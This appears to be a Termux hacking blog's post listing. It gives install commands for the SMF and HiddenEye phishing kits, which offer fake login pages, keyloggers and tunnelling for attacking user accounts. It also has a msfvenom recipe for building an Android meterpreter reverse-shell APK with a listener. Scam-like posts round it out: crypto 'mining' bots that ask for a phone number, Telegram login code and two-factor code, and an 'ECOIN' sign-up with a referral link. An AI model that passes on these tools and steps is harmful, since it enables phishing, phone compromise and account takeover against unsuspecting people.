Skip to main content

Posts

FOLLOW THE INSTRUCTIONS

ECOIN WELCOME PAGE 📲 STEPS 1. ENTER EMAIL ADDRESS 2. LINK PHONE NUMBER WITH TELEGRAM 3. LINK PHONE NUMBER WITH WHATSAPP 4. GO TO GMAIL AND VERIFY ECOIN ACCOUNT 1. SIGN UP TO ECOIN ACCOUNT 1 . SELECT EMAIL TO SIGN UP 3. ECOIN LOGIN PAGE MESSAGE 4. LINK YOUR PHONE NUMBER WITH TELEGRAM 5. LINK YOUR PHONE NUMBER WITH WHATSAPP 6. GO TO YOUR GMAIL ACCOUNT  AND SELECT MY ACCOUNT. THEN YOUR ACCOUNT FULLY VERIFIED👍 👇👇👇👇👇👇👇👇👇👇 CLICK HERE TO CONTINUE
Recent posts

SMF HACKING TOOLS v1.2

TECH COCHI SMF HACKING TOOL Installation Commands  apt update apt upgrade pkg install git git clone https://github.com/rixon-cochi/SMF.git cd SMF bash install.sh bash smf.sh INSTALLING VIDEO <<< If you copy , Then Give me The Credits >>> Features : [+] Latest Login Pages ! [+] New Instagram Auto Follower Page ! [+] 4 Port Forwarding Options ! [+] Easy for Beginners ! Tunelling Options : > Localhost (127.0.0.1) > NGROK ( https://ngrok.com ) > SERVEO ( https://serveo.net ) > LOCALHOSTRUN ( https://localhost.run ) http://share.xudfu.com/news_detail/1.html?InviteCode=SGBE_7017035&appid=4 Find Me on :     loading...

DOGE COIN TELEGRAM BOT

DODE COIN BOT   download now 👇👇👇👇👇👇 DOWNLOAD SCRIPT COMMANDS ✔️ * apt update * apt upgrade * pkg install python unzip doge.zip (file) * cd doge * python 1.py (+91enter your number) * Enter your code * If you add any two factor authentication (enter that number) * Preview doge coin mining * Stop this mining enter   Ctrl+c SECOND CHANNEL TELEGRAM GITHUB

Metasploit Payload Creating

Metasploit Payload Creating COMMANDS * ./msfconsole * ./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5432 R>appname.apk * mv (appname.apk) /storage/emulated/0 * use exploit/multi/handler * set payload android/meterpreter/reverse_tcp * set LHOST localhost * set LPORT (5432) * exploit * help SECOND CHANNEL TELEGRAM GITHUB

Metasploit Framework Installation

Metasploit Framework The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development. Finding Modules Modules are the core components of the Metasploit Framework. A module is a piece of software that can perform a specific action, such as scanning or exploiting. Each task that you can perform with the Metasploit Framework is defined within a module. You can locate modules in the following directory:  /path/to/metasploit/apps/pro/msf3/modules  if you installed Metasploit using the binaries or  /path/to/metasploit-framework-repo/modules  if you cloned the repository from GitHub. The modul

Install Hidden Eye – Advanced Phishing Tool

INSTALL HIDDEN EYE ADVANCE FISHING TOOL Hidden Eye Hidden Eye is a tool that contain a variety of online attacking tools such as Phishing, Keylogger, Information gathering, etc. Hidden Eye used to perform plenty of online attacks on user accounts. By using Hidden Eye you can have your target live information such as IP ADDRESS, Geolocation, ISP, Country, & many more. Hidden Eye Tested on Following Platforms Kali Linux – Rolling Edition Parrot OS – Rolling Edition Linux Mint – 18.3 Sylvia Ubuntu – 16.04.3 LTS MacOS High Sierra Arch Linux Manjaro XFCE Edition 17.1.12 Black Arch Userland App (For Android Users) Termux App (For Android Users) What are Prerequisites for Hidden Eye Please verify the following installed and updated before you go for installation. Python 3 PHP sudo How to Install it on Linux Step -1 git clone https://github.com/DarkSecDevelopers/HiddenEye.git Step – 2 chmod 777 HiddenEye Step – 3 sudo apt install python3-pip Step – 4 cd HiddenEye Step – 5 sudo

BITCOIN FREE MINING SITE

BITCOIN MINING FREE CLOUD WEBSITE COMMANDS * apt update * apt upgrade * pkg install php * pkg update php * ls * cd storage * ls * cd download * unzip  REEMINING.zip * mv  REEMINING $HOME * cd * ls * cd REEMINING * cat cfg.php * php bot.php _________________________________________________ PREVIEW _________________________________________________ BITCOIN SITE   Click here   SCRIPT DOWNLOAD   Click here Https_Canary    Click here Ex file explorer   Click here Crypto wallet   Click here Termux   Click here _________________________________________________ YouTube Channel   Click here Telegram Channel   Click here